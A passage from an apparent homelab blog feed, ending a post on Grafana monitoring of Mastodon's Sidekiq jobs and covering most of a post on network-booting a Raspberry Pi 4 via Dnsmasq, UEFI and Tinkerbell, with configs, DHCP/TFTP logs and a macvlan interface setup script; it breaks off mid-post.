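<p>Just as an illustration, a minimal NetworkPolicy along the following lines could allow
those scrapes. The namespace names and labels are assumptions and will differ from setup
to setup:</p>
<pre tabindex="0"><code># Sketch only: allow ingress from the Prometheus namespace to all Mastodon Pods
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-prometheus-scrape
  namespace: mastodon                 # assumption: namespace of the Mastodon Pods
spec:
  podSelector: {}                     # applies to every Pod in the namespace
  policyTypes:
    - Ingress
  ingress:
    - from:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: monitoring   # assumption: Prometheus namespace
</code></pre>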
<p>Next I went to my Grafana instance and created a few panels in a fresh dashboard
to show the interesting data. I created a couple of stats panels first:</p>
<figure>
    <img loading="lazy" src="stats.png"
         alt="A screenshot of multiple Grafana stats panels. The first one is for &#39;Dead Jobs&#39;, showing that right now, there are 1196 of them. Next come the failed jobs, with 57k jobs and then the big one, 3.55 million processed jobs. That&#39;s followed by the retry queue with 96 entries and the scheduled queue, with 54 entries."/> <figcaption>
            <p>The overview stats panels in my Mastodon dashboard.</p>
        </figcaption>
</figure>

<p>Then I&rsquo;ve also got two time series panels, starting with the total jobs by type:
<figure>
    <img loading="lazy" src="total-jobs.png"
         alt="A screenshot of a Grafana time series panel, showing six hours from 16:00 to 22:00. The legend shows a number of different job types from Mastodon&#39;s system, like the FetchReplyWorker or the RefollowWorker. The plot is stacked, and hovers around 100 jobs on average. But around 16:50, 19:10, 20:28, 20:40, 21:00, 21:45, 22:00, there are peaks up to 300 to 500 jobs, driven by the ActivityPub:DeliveryWorker."/> <figcaption>
            <p>The current jobs running.</p>
        </figcaption>
</figure>

This plot shows the increase in jobs in the given period. It nicely shows the
times where I made a post or boosted a post today. So this plot alone was already
worth it. &#x1f642;</p>
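<p>For reference, a query of roughly this shape could back such a panel. The metric and
label names below are placeholders; the real names depend on the exporter Mastodon&rsquo;s
Sidekiq uses:</p>
<pre tabindex="0"><code># Hypothetical PromQL for a stacked jobs-by-type panel; metric and label names are placeholders
sum by (worker) (increase(sidekiq_jobs_processed_total[5m]))
</code></pre>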
<p>Next, I&rsquo;ve also got a plot for the failed jobs:
<figure>
    <img loading="lazy" src="failed-jobs.png"
         alt="A screenshot of a Grafana time series panel, showing the failed jobs by type. It shows none for a lot of the time, but again, whenever I post or boost something, around the same times as the previous plot, the failed jobs shoot up, albeit only to around 22."/> <figcaption>
            <p>Failed jobs during the same time frame.</p>
        </figcaption>
</figure>
</p>
<p>I would have wished for a bit more info, to be honest. At least the general
instance information available in Mastodon&rsquo;s admin dashboard would have been nice.</p>
<p>But this is enough for now, and it&rsquo;s going to be interesting to see how the
daily jobs develop in the future.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Tinkerbell Part IV: Provisioning a Raspberry Pi 4</title>
      <link>https://blog.mei-home.net/posts/tinkerbell-4-provisioning-pi4/</link>
      <pubDate>Sun, 29 Jun 2025 17:20:54 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/tinkerbell-4-provisioning-pi4/</guid>
      <description>I configure Tinkerbell and Dnsmasq to provision a Pi 4 with a USB SSD</description>
      <content:encoded><![CDATA[<p>In this post, I will show how I provisioned a Raspberry Pi 4 with an attached
USB SSD via Tinkerbell.</p>
<p>This is part 4 of my <a href="https://blog.mei-home.net/tags/series-tinkerbell/">Tinkerbell series</a>.</p>
<p>The main goal of this post is to get this little guy to boot into Tinkerbell&rsquo;s
<a href="https://tinkerbell.org/docs/additionalcomponents/hookos/">HookOS</a> and install
an Ubuntu 24.04 Raspberry Pi image onto the SSD:</p>
<figure>
    <img loading="lazy" src="the-pi.jpg"
         alt="A picture of a desk with a Raspberry Pi 4 board and accessories. The Pi 4 is clad in a passive red heat sink and mounted on a right-angle piece of metal. It&#39;s connected to a small 7 inch screen with an HDMI and an USB cable. Furthermore, it&#39;s also connected to a keyboard and has a network cable plugged in. Finally, it&#39;s also connected to a 2.5 inch Kingston SATA SSD via a USB-to-SATA adapter."/> <figcaption>
            <p>My experimental setup.</p>
        </figcaption>
</figure>

<p>To get the Ubuntu image onto the SSD and have the Pi boot from it, the following
steps need to be executed:</p>
<ol>
<li>Boot the Pi into a UEFI firmware via the Pi&rsquo;s weird PXE boot procedure</li>
<li>From the UEFI firmware, boot into iPXE, again via PXE boot</li>
<li>Fetch the iPXE script to execute HookOS from Tinkerbell. Again, you guessed
it, via PXE</li>
<li>Finally, boot HookOS itself</li>
</ol>
<h2 id="raspberry-pi-pxe-boot-to-uefi">Raspberry Pi PXE boot to UEFI</h2>
<p>To understand the rest of this post, let&rsquo;s start with a quick look at the
Raspberry Pi&rsquo;s netboot process. It all starts with a DHCP request. The direct
reply to that request might already contain a TFTP server address. If it doesn&rsquo;t,
the Pi&rsquo;s firmware will also wait for a Proxy DHCP reply. With this configuration,
it&rsquo;s possible to split the normal DHCP server doing IP address management and the
DHCP server which supplies PXE boot parameters.</p>
<p>When a TFTP server address is indeed received, the Pi starts to download files
from it. The boot file option that can also be supplied for PXE is not supported
by the Pi netboot process. It doesn&rsquo;t matter what that option is set to, and
whether it&rsquo;s sent in the DHCP reply or not. It&rsquo;s just ignored. The initial file
being downloaded is the <code>config.txt</code> file. It contains configuration for the
firmware. Relevant to the boot process are the options for the <a href="https://www.raspberrypi.com/documentation/computers/config_txt.html#kernel">kernel</a> and
<a href="https://www.raspberrypi.com/documentation/computers/config_txt.html#initramfs">initramfs</a>
as well as, in this particular case, the <a href="https://www.raspberrypi.com/documentation/computers/legacy_config_txt.html#armstub">armstub</a>
option. The <code>armstub</code> tells the boot firmware - which runs on the GPU, on this
SoC - what to load up on the ARM CPU cores after the initial boot. By default,
that&rsquo;s just looking to load the <code>kernel</code> and <code>initramfs</code> during a normal boot,
leading to Linux being started. But when the <code>armstub</code> is set, the given file
is loaded instead. In all three cases, the files given are loaded from the
TFTP server when netbooting.</p>
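<p>To make this a bit more concrete, a <code>config.txt</code> for booting into a UEFI stub could
look roughly like this. It is a sketch based on the options just described, not the exact
file from the firmware bundle I used:</p>
<pre tabindex="0"><code># Sketch of a netboot config.txt for a Pi 4 UEFI stub (values are assumptions)
arm_64bit=1
enable_uart=1
# Load the UEFI firmware on the ARM cores instead of a Linux kernel
armstub=RPI_EFI.fd
</code></pre>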
<p>To load the Pi in UEFI mode, I&rsquo;ve been using <a href="https://github.com/rgl/rpi4-uefi-ipxe">this repository</a>.
Initially, I thought I needed this &ldquo;special&rdquo; firmware to get iPXE running, but
it turns out that the <a href="https://ipxe.org/">iPXE project</a> already provides the
<code>snp.efi</code> file, which is compatible with a Pi 4 booted into UEFI.</p>
<p>So for now, the goal is to get the Pi booted into the UEFI stub.</p>
<h2 id="dnsmasq-server-setup">Dnsmasq server setup</h2>
<p>To supply all of these files via TFTP, I needed a TFTP server. While
Tinkerbell does provide TFTP capabilities, those are very rudimentary and only
intended to provide the iPXE binary for PXE booting hosts, and nothing more.</p>
<p>As I&rsquo;ve already got a Dnsmasq instance running in my Homelab, for my regular
netbooters, I decided to use it here as well. And that was quite a ride in
and of itself, because of the way Kubernetes networking and DHCP work.</p>
<p>I set Dnsmasq up on my k3s test cluster running on a VM. I could not make the
Pod use host networking, because Tinkerbell, which also needed to listen on
port 67 for DHCP, was already running on the same host. So I decided to use
the same trick that Tinkerbell uses, a <code>macvlan</code> type interface. This type of
Linux interface is attached to a real physical interface, but gets a different
MAC, so it&rsquo;s basically a completely separate interface. The rest of the network
just knows that there are now two MAC addresses behind the given switch port instead
of just one. Tinkerbell has the same approach, see <a href="https://github.com/tinkerbell/tinkerbell/blob/main/helm/tinkerbell/templates/host-interface-config-map.yaml">here</a>.</p>
<p>This script creates an additional interface, which piggy-backs off of the physical
interface to make it possible for a Pod to receive and send broadcast packets.
With just the VIP created by <a href="https://kube-vip.io/">kube-vip</a> for LoadBalancer
services, broadcast packets are just not forwarded to the Pod, and Dnsmasq never
sees them. This is problematic, as the initial DHCP discover packets are sent
as broadcast, as the host hasn&rsquo;t been configured yet and doesn&rsquo;t know about the
DHCP server in the subnet.</p>
<p>After configuring the macvlan interface, I tried this Dnsmasq configuration:</p>
<pre tabindex="0"><code>port=0
dhcp-range=203.0.113.255,proxy
log-dhcp
enable-tftp
tftp-root=/tftp-files
pxe-service=0,&#34;Raspberry Pi Boot&#34;,203.0.113.17
</code></pre><p>Together with the manually created macvlan interface, Dnsmasq was able to
receive the broadcast packets - but it wasn&rsquo;t able to answer them. Instead, I
got this line in the logs:</p>
<pre tabindex="0"><code>dnsmasq-dhcp[18135]: no address range available for DHCP request via macvlandnsm
</code></pre><p>After some digging, I figured out that the issue was that Dnsmasq uses the subnet
of the interface where a DHCP request arrives to determine which <code>dhcp-range</code>
parameter to use for the answer. And in this case, the <code>macvlandnsm</code> interface
gets the hardcoded <code>127.1.1.1</code> IP in the script. So I changed the <code>dhcp-range</code>
parameter like this:</p>
<pre tabindex="0"><code>dhcp-range=127.1.1.255,proxy
</code></pre><p>And this &ldquo;worked&rdquo;:</p>
<pre tabindex="0"><code>dnsmasq[2837]: started, version 2.91 DNS disabled
dnsmasq[2837]: compile time options: IPv6 GNU-getopt no-DBus no-UBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset no-nftset auth no-DNSSEC loop-detect inotify dumpfile
dnsmasq-dhcp[2837]: DHCP, proxy on subnet 127.1.1.255
dnsmasq-tftp[2837]: TFTP root is /tftp-files
dnsmasq-dhcp[2837]: 2783272004 available DHCP subnet: 127.1.1.255/255.0.0.0
dnsmasq-dhcp[2837]: 2783272004 vendor class: PXEClient:Arch:00000:UNDI:002001
dnsmasq-dhcp[2837]: 2783272004 PXE(macvlandnsm) e4:5f:01:bc:f4:ce proxy
dnsmasq-dhcp[2837]: 2783272004 tags: macvlandnsm
dnsmasq-dhcp[2837]: 2783272004 broadcast response
dnsmasq-dhcp[2837]: 2783272004 sent size:  1 option: 53 message-type  2
dnsmasq-dhcp[2837]: 2783272004 sent size:  4 option: 54 server-identifier  127.1.1.1
dnsmasq-dhcp[2837]: 2783272004 sent size:  9 option: 60 vendor-class  50:58:45:43:6c:69:65:6e:74
dnsmasq-dhcp[2837]: 2783272004 sent size: 17 option: 97 client-machine-id  00:34:69:50:52:15:31:c0:00:01:bc:f4:ce:cb...
dnsmasq-dhcp[2837]: 2783272004 sent size: 41 option: 43 vendor-encap  06:01:03:0a:04:00:50:58:45:08:07:80:00:01...
dnsmasq-dhcp[2837]: 2783272004 available DHCP subnet: 127.1.1.255/255.0.0.0
dnsmasq-dhcp[2837]: 2783272004 vendor class: PXEClient:Arch:00000:UNDI:002001
</code></pre><p>So Dnsmasq did receive the DHCP request, and it also answered it. But
have a closer look at this line:</p>
<pre tabindex="0"><code>dnsmasq-dhcp[2837]: 2783272004 sent size:  4 option: 54 server-identifier  127.1.1.1
</code></pre><p>Note the <code>127.1.1.1</code> IP returned by Dnsmasq to the netbooting Pi. That&rsquo;s what
the Pi uses as the TFTP server. And of course, that address is from the loopback
range, and hence isn&rsquo;t accessible for the Pi at all.</p>
<p>After some additional tinkering and testing, I came up with the solution of simply
assigning the <code>macvlandnsm</code> interface a routable IP, as a
<code>/24</code> instead of a <code>/32</code>. Then I reset the <code>dhcp-range</code> option to contain the
actual subnet:</p>
<pre tabindex="0"><code>dhcp-range=203.0.113.255,proxy
</code></pre><p>With these changes, the Pi was then able to boot into UEFI:</p>
<pre tabindex="0"><code>dnsmasq-dhcp[20493]: 2783272890 available DHCP subnet: 203.0.113.255/255.255.255.0
dnsmasq-dhcp[20493]: 2783272890 vendor class: PXEClient:Arch:00000:UNDI:002001
dnsmasq-dhcp[20493]: 2783272890 PXE(macvlandnsm) e4:5f:01:bc:f4:ce proxy
dnsmasq-dhcp[20493]: 2783272890 tags: macvlandnsm
dnsmasq-dhcp[20493]: 2783272890 broadcast response
dnsmasq-dhcp[20493]: 2783272890 sent size:  1 option: 53 message-type  2
dnsmasq-dhcp[20493]: 2783272890 sent size:  4 option: 54 server-identifier  203.0.113.18
dnsmasq-dhcp[20493]: 2783272890 sent size:  9 option: 60 vendor-class  50:58:45:43:6c:69:65:6e:74
dnsmasq-dhcp[20493]: 2783272890 sent size: 17 option: 97 client-machine-id  00:34:69:50:52:15:31:c0:00:01:bc:f4:ce:cb...
dnsmasq-dhcp[20493]: 2783272890 sent size: 41 option: 43 vendor-encap  06:01:03:0a:04:00:50:58:45:08:07:80:00:01...
dnsmasq-dhcp[20493]: 2783272890 available DHCP subnet: 203.0.113.255/255.255.255.0
dnsmasq-dhcp[20493]: 2783272890 vendor class: PXEClient:Arch:00000:UNDI:002001
dnsmasq-tftp[20493]: sent /tftp-files/config.txt to 203.0.113.70
dnsmasq-tftp[20493]: sent /tftp-files/start4.elf to 203.0.113.70
dnsmasq-tftp[20493]: sent /tftp-files/fixup4.dat to 203.0.113.70
dnsmasq-tftp[20493]: sent /tftp-files/config.txt to 203.0.113.70
dnsmasq-tftp[20493]: sent /tftp-files/config.txt to 203.0.113.70
dnsmasq-tftp[20493]: sent /tftp-files/config.txt to 203.0.113.70
dnsmasq-tftp[20493]: sent /tftp-files/config.txt to 203.0.113.70
dnsmasq-tftp[20493]: sent /tftp-files/bcm2711-rpi-4-b.dtb to 203.0.113.70
dnsmasq-tftp[20493]: sent /tftp-files/config.txt to 203.0.113.70
dnsmasq-tftp[20493]: sent /tftp-files/config.txt to 203.0.113.70
dnsmasq-tftp[20493]: sent /tftp-files/overlays/miniuart-bt.dtbo to 203.0.113.70
dnsmasq-tftp[20493]: sent /tftp-files/overlays/upstream-pi4.dtbo to 203.0.113.70
dnsmasq-tftp[20493]: sent /tftp-files/RPI_EFI.fd to 203.0.113.70
</code></pre><p>I have removed a number of lines from the log output where the Pi aborted the
transmission. The firmware uses these aborted transfers to check whether a certain file
is present on the TFTP server and to decide what to download next.</p>
<p>To provide the files in the <code>/tftp-files</code> directory in the Dnsmasq Pod, I used
<a href="https://github.com/rgl/rpi4-uefi-ipxe/releases/tag/v0.11.0">this release</a>. I
took the <code>rpi4-uefi-ipxe.zip</code> file and unpacked it all in the <code>/tftp-files</code>
dir, to which I had mounted a PersistentVolume.</p>
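<p>In practice, populating the TFTP root boils down to something like the following; the
release URL follows GitHub&rsquo;s usual asset naming, so treat it as an assumption and verify
it before use:</p>
<pre tabindex="0"><code># Assumed commands to fill the TFTP root from the v0.11.0 release
curl -fsSLO https://github.com/rgl/rpi4-uefi-ipxe/releases/download/v0.11.0/rpi4-uefi-ipxe.zip
unzip rpi4-uefi-ipxe.zip -d /tftp-files
</code></pre>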
<p>I&rsquo;ve also simplified Tinkerbell&rsquo;s manual interface setup script a bit to use
it with Dnsmasq. It now looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#75715e">#!/usr/bin/env sh
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Script taken from Tinkerbell: https://raw.githubusercontent.com/tinkerbell/tinkerbell/refs/heads/main/helm/tinkerbell/templates/host-interface-config-map.yaml</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># This script allows us to listen and respond to DHCP requests on a host network interface and interact with Dnsmasq.</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>set -xeuo pipefail
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">function</span> usage<span style="color:#f92672">()</span> <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;Usage: </span>$0<span style="color:#e6db74"> [OPTION]...&#34;</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;Init script for setting up a network interface to listen and respond to DHCP requests from the Host and move it into a container.&#34;</span>
</span></span><span style="display:flex;"><span>    echo
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;Options:&#34;</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;  -s, --src     Source interface for listening and responding to DHCP requests (default: default gateway interface)&#34;</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;  -t, --type    Create the interface of type, must be either ipvlan or macvlan (default: macvlan)&#34;</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;  -c, --clean   Clean up any interfaces created&#34;</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;  -h, --help    Display this help and exit&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">function</span> binary_exists<span style="color:#f92672">()</span> <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>    command -v <span style="color:#e6db74">&#34;</span>$1<span style="color:#e6db74">&#34;</span> &gt;/dev/null 2&gt;&amp;<span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">function</span> main<span style="color:#f92672">()</span> <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>    local src_interface<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;</span>$1<span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>    local interface_type<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;</span>$2<span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>    local interface_mode<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;</span>$3<span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>    local interface_name<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;macvlandnsm&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># Preparation</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># Delete existing interfaces in the container</span>
</span></span><span style="display:flex;"><span>    ip link del <span style="color:#e6db74">${</span>interface_name<span style="color:#e6db74">}</span> <span style="color:#f92672">||</span> true
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># Delete existing interfaces in the host namespace</span>
</span></span><span style="display:flex;"><span>    nsenter -t1 -n ip link del <span style="color:#e6db74">${</span>interface_name<span style="color:#e6db74">}</span> <span style="color:#f92672">||</span> true
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># Create the interface</span>
</span></span><span style="display:flex;"><span>    echo  <span style="color:#e6db74">&#34;Creating interface </span><span style="color:#e6db74">${</span>interface_name<span style="color:#e6db74">}</span><span style="color:#e6db74"> of type </span><span style="color:#e6db74">${</span>interface_type<span style="color:#e6db74">}</span><span style="color:#e6db74"> with mode </span><span style="color:#e6db74">${</span>interface_mode<span style="color:#e6db74">}</span><span style="color:#e6db74"> linked to </span><span style="color:#e6db74">${</span>src_interface<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>    nsenter -t1 -n ip link add <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>interface_name<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> link <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>src_interface<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> type <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>interface_type<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> mode <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>interface_mode<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">||</span> true
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># Move the interface into the Pod container</span>
</span></span><span style="display:flex;"><span>    pid<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>echo $$<span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;Moving interface </span><span style="color:#e6db74">${</span>interface_name<span style="color:#e6db74">}</span><span style="color:#e6db74"> into container with PID </span><span style="color:#e6db74">${</span>pid<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>    nsenter -t1 -n ip link set <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>interface_name<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> netns <span style="color:#e6db74">${</span>pid<span style="color:#e6db74">}</span> <span style="color:#f92672">||</span> nsenter -t1 -n ip link delete <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>interface_name<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># Bring up the interface</span>
</span></span><span style="display:flex;"><span>    ip link set dev <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>interface_name<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> up
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># Set the IP address</span>
</span></span><span style="display:flex;"><span>    ip addr add 203.0.113.18/24 dev <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>interface_name<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> noprefixroute <span style="color:#f92672">||</span> true
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>src_interface<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>interface_type<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;macvlan&#34;</span>
</span></span><span style="display:flex;"><span>interface_mode<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;bridge&#34;</span>
</span></span><span style="display:flex;"><span>clean<span style="color:#f92672">=</span>false
</span></span><span style="display:flex;"><span><span style="color:#75715e"># s: means -s requires an argument</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># s:: means -s has an optional argument</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># s (without colon) means -s doesn&#39;t accept arguments</span>
</span></span><span style="display:flex;"><span>args<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>getopt -a -o s::ch --long src::,clean,help -- <span style="color:#e6db74">&#34;</span>$@<span style="color:#e6db74">&#34;</span><span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> $? -gt <span style="color:#ae81ff">0</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>usage
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>eval set -- <span style="color:#e6db74">${</span>args<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">while</span> :
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">do</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">case</span> $1 in
</span></span><span style="display:flex;"><span>    -s | --src<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>      <span style="color:#75715e"># If $2 starts with &#39;-&#39; or is empty (--), it&#39;s not a value but another option</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> <span style="color:#e6db74">&#34;</span>$2<span style="color:#e6db74">&#34;</span> <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;--&#34;</span> <span style="color:#f92672">||</span> <span style="color:#e6db74">&#34;</span>$2<span style="color:#e6db74">&#34;</span> <span style="color:#f92672">==</span> -* <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>          src_interface<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>          shift
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>          src_interface<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;</span>$2<span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>          shift <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>      ;;
</span></span><span style="display:flex;"><span>    -c | --clean<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>      clean<span style="color:#f92672">=</span>true
</span></span><span style="display:flex;"><span>      shift ;;
</span></span><span style="display:flex;"><span>    -h | --help<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>      usage
</span></span><span style="display:flex;"><span>      exit <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>      shift ;;
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># -- means the end of the arguments; drop this, and break out of the while loop</span>
</span></span><span style="display:flex;"><span>    --<span style="color:#f92672">)</span> shift; break ;;
</span></span><span style="display:flex;"><span>    *<span style="color:#f92672">)</span> &gt;&amp;<span style="color:#ae81ff">2</span> echo Unsupported option: $1
</span></span><span style="display:flex;"><span>      usage ;;
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">esac</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> -z <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>src_interface<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>    src_interface<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>nsenter -t1 -n ip route | awk <span style="color:#e6db74">&#39;/default/ {print $5}&#39;</span> | head -n1<span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>clean<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># Delete existing interfaces in the container</span>
</span></span><span style="display:flex;"><span>    ip link del macvlandnsm <span style="color:#f92672">||</span> true
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># Delete existing interfaces in the host namespace</span>
</span></span><span style="display:flex;"><span>    nsenter -t1 -n ip link del macvlandnsm <span style="color:#f92672">||</span> true
</span></span><span style="display:flex;"><span>    exit <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>main <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>src_interface<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>interface_type<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>interface_mode<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span></code></pre></div><p>Here is the current state of the boot:</p>
<figure>
    <img loading="lazy" src="uefi-boot.jpg"
         alt="A picture of a screen showing the Pi booted into the UEFI firmware. In the background, it shows the Raspberry Pi raspberry. At the bottom, several shortcuts are shown to enter setup, the shell or continue booting. At the top, text showing an attempt to do a PXE boot via IPv4 and IPv6 is displayed. In both cases, the remote boot failed."/> <figcaption>
            <p>The Pi successfully boots into the UEFI firmware.</p>
        </figcaption>
</figure>

<h2 id="getting-the-pi-to-execute-tinkerbells-ipxe-script">Getting the Pi to execute Tinkerbell&rsquo;s iPXE script</h2>
<p>It was very convenient to see that the UEFI firmware also attempts a PXE boot.
This allowed me to continue by pointing this stage of the boot to Tinkerbell&rsquo;s
iPXE binaries. For the most part, these are standard iPXE binary builds. The
only difference is that Tinkerbell adds a user class to the DHCP requests that
the iPXE boot program sends, to make those requests easier to identify and work
with.</p>
<p>Instructing the UEFI firmware to fetch the iPXE binary from Tinkerbell only needed
one additional setting in Dnsmasq:</p>
<pre tabindex="0"><code>pxe-service=ARM64_EFI,&#34;EFI Netboot&#34;,snp.efi,203.0.113.200
</code></pre><p>This line sets the boot file to <code>snp.efi</code> and instructs the UEFI firmware to
fetch it from Tinkerbell, not Dnsmasq. This is what the exchange looks like:</p>
<pre tabindex="0"><code>dnsmasq-dhcp[3309]: 3924602938 available DHCP subnet: 203.0.113.255/255.255.255.0
dnsmasq-dhcp[3309]: 3924602938 vendor class: PXEClient:Arch:00011:UNDI:003000
dnsmasq-dhcp[3309]: 3924602938 PXE(macvlandnsm) e4:5f:01:bc:f4:ce proxy
dnsmasq-dhcp[3309]: 3924602938 tags: macvlandnsm
dnsmasq-dhcp[3309]: 3924602938 bootfile name: snp.efi
dnsmasq-dhcp[3309]: 3924602938 server name: 203.0.113.200
dnsmasq-dhcp[3309]: 3924602938 next server: 203.0.113.200
dnsmasq-dhcp[3309]: 3924602938 sent size:  1 option: 53 message-type  5
dnsmasq-dhcp[3309]: 3924602938 sent size:  4 option: 54 server-identifier  203.0.113.18
dnsmasq-dhcp[3309]: 3924602938 sent size:  9 option: 60 vendor-class  50:58:45:43:6c:69:65:6e:74
dnsmasq-dhcp[3309]: 3924602938 sent size: 17 option: 97 client-machine-id  00:15:31:c0:00:00:00:00:00:00:00:e4:5f:01...
</code></pre><p>This got me a little bit further, but ended with the Pi dropping me into the
UEFI firmware screen:</p>
<figure>
